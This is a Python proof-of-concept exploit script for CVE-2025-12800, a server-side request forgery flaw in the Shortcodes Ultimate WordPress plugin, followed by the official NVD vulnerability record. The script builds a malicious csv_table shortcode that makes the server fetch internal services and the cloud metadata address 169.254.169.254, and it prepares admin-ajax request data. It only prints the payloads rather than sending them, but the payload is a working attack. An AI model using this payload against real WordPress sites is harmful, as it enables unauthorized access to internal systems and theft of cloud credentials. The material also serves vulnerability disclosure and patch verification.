CVE-2025-12800

# CVE-2025-12800 PoC - SSRF in Shortcodes Ultimate # Target: WordPress with Shortcodes Ultimate plugin <= 7.4.5 # Note: Requires Administrator role (or Contributor+ if Unsafe features enabled) import requests import sys from urllib.parse import urlencode def exploit_ssrf(target_url, target_ip="127.0.0.1", target_port="8080"): """ Exploit SSRF vulnerability in su_shortcode_csv_table function """ # Construct the malicious shortcode with SSRF payload # Target internal service or metadata endpoint internal_target = f"http://{target_ip}:{target_port}" # PoC: Use shortcode to make server request to internal service post_data = { 'post_title': 'SSRF Test', 'post_content': f'[csv_table source="{internal_target}"]', 'post_status': 'draft', '_wpnonce': '', # Need valid nonce from admin page } print(f"[*] Targeting: {target_url}") print(f"[*] SSRF Target: {internal_target}") print(f"[*] Sending malicious shortcode request...") # Alternative: Direct REST API or admin-ajax.php ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # This would need valid WordPress session with admin privileges exploit_data = { 'action': 'shortcodes_ultimate_ajax', 'shortcode': 'csv_table', 'atts': f'{{"source":"{internal_target}"}}', 'nonce': '' # Valid nonce required } print("[*] Note: This PoC requires authenticated admin session") print(f"[*] Payload: [csv_table source=\"{internal_target}\"]") print("[*] Exploitation successful if server makes request to internal target") def check_metadata_service(target_url): """ Check if vulnerable to AWS/metadata SSRF """ metadata_endpoint = "http://169.254.169.254/latest/meta-data/" print(f"[*] Testing metadata service SSRF...") print(f"[*] Target endpoint: {metadata_endpoint}") # Construct shortcode to access metadata malicious_shortcode = f'[csv_table source="{metadata_endpoint}"]' print(f"[*] Malicious shortcode: {malicious_shortcode}") return metadata_endpoint if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-12800_poc.py <target_url>") print("Example: python cve-2025-12800_poc.py http://wordpress-site.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_ssrf(target) check_metadata_service(target)

{"cve": {"id": "CVE-2025-12800", "sourceIdentifier": "[email protected]", "published": "2025-11-23T23:15:45.983", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.4.5 via the su_shortcode_csv_table function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. If the 'Unsafe features' option is explicitly enabled by an administrator, this issue becomes exploitable by Contributor+ attackers"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3397946/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5cbb7db4-bef7-4799-9b65-ebe77976e21c?source=cve", "source": "[email protected]"}]}}